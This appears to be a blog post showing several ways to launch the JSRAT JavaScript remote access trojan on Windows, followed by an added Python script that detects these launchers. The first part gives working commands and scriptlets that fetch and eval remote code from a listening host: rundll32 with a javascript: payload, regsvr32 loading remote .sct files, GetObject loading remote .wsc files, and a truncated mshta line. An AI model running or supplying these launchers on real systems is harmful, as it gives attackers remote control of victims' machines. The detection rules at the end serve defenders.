Several ways to launch JSRAT
1. Default method

```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
```

2. Use SCT

Run calculator:

```
regsvr32 /u /s /i:http://urlto/calc.sct scrobj.dll
```
calc.sct:

```xml
<?XML version="1.0"?>
<scriptlet>
<registration
    description="Empire"
    progid="Empire"
    version="1.00"
    classid="{20001111-0000-0000-0000-0000FEEDACDC}"
    >
    <!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll -->
    <!-- regsvr32 /s /i:http://server/Backdoor.sct scrobj.dll -->
    <!-- That should work over a proxy and SSL/TLS... -->
    <!-- Proof Of Concept - Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
        ]]>
    </script>
</registration>
<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
    <![CDATA[
        function Exec() {
            var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
        }
    ]]>
</script>
</scriptlet>
```
Run JSRAT:

```
regsvr32 /s /n /u /i:http://urlto/JSRAT.sct scrobj.dll
```

JSRAT.sct:

```xml
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            rat="rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://127.0.0.1/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}";
            new ActiveXObject("WScript.Shell").Run(rat,0,true);
        ]]>
    </script>
</registration>
</scriptlet>
```
3. Use WSC

Run calculator:

```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://urlto/calc.wsc")
```

calc.wsc:

```xml
<?xml version="1.0"?>
<package>
<component id="testCalc">
    <script language="JScript">
        <![CDATA[
            var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
        ]]>
    </script>
</component>
</package>
```
Run JSRAT:

```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://urlto/JSRAT.wsc")
```

JSRAT.wsc:

```xml
<?xml version="1.0"?>
<package>
<component id="testCalc">
    <script language="JScript">
        <![CDATA[
            rat="rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://127.0.0.1/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}";
            new ActiveXObject("WScript.Shell").Run(rat,0,true);
        ]]>
    </script>
</component>
</package>
```
4. Use MSHTA

```
mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXOb
```
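As an added defender-side example (not code from the original post), the following Python script flags process command lines that match the launcher shapes described above: rundll32 or mshta with a javascript: RunHTMLApplication payload, regsvr32 pulling a remote .sct through scrobj.dll, GetObject("script:...") loading a remote .wsc, and the taskkill self-cleanup of the rundll32 host. The sample events are constructed, and the (image, command line) field layout is an assumption modelled on Sysmon process-creation events (Event ID 1).

```python
import re

# Heuristic rules for the launcher patterns shown in this post (defender-side).
RULES = [
    ("rundll32/mshta javascript: RunHTMLApplication",
     re.compile(r"\b(rundll32(\.exe)?|mshta(\.exe)?)\b.*javascript:.*RunHTMLApplication", re.I)),
    ("regsvr32 remote scriptlet via scrobj.dll",
     re.compile(r"\bregsvr32(\.exe)?\b.*(/|-)i:\s*https?://.*scrobj\.dll", re.I)),
    ('GetObject("script:") remote WSC load',
     re.compile(r"GetObject\s*\(\s*[\"']script:", re.I)),
    ("self-cleanup taskkill of rundll32 host",
     re.compile(r"taskkill\b.*/im\s+rundll32\.exe", re.I)),
]

def classify(cmdline):
    """Return the names of every rule matched by one process command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(events):
    """events: iterable of (image, command_line) tuples (assumed Sysmon-like layout).
    Returns [(image, [matched rule names]), ...] for suspicious entries only."""
    hits = []
    for image, cmdline in events:
        matched = classify(cmdline)
        if matched:
            hits.append((image, matched))
    return hits

# Constructed sample events modelled on the commands in this post (not real telemetry).
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\rundll32.exe",
     'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://urlto/calc.wsc")'),
    ("C:\\Windows\\System32\\regsvr32.exe",
     "regsvr32 /s /n /u /i:http://urlto/JSRAT.sct scrobj.dll"),
    ("C:\\Windows\\System32\\mshta.exe",
     'mshta javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1")'),
    # Benign-looking uses of the same binaries, which should not be flagged.
    ("C:\\Windows\\System32\\regsvr32.exe",
     "regsvr32 /s C:\\Program Files\\Vendor\\legit.dll"),
    ("C:\\Windows\\System32\\rundll32.exe",
     "rundll32.exe shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for image, rules in scan(SAMPLE_EVENTS):
        print(image, "->", ", ".join(rules))
```

The patterns are deliberately broad; tune them against a baseline of legitimate rundll32, regsvr32 and mshta usage in your own environment before alerting on them.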
Source: Evi1cg's blog
Original link:
https://evi1cg.me/archives/Run_JSRAT.html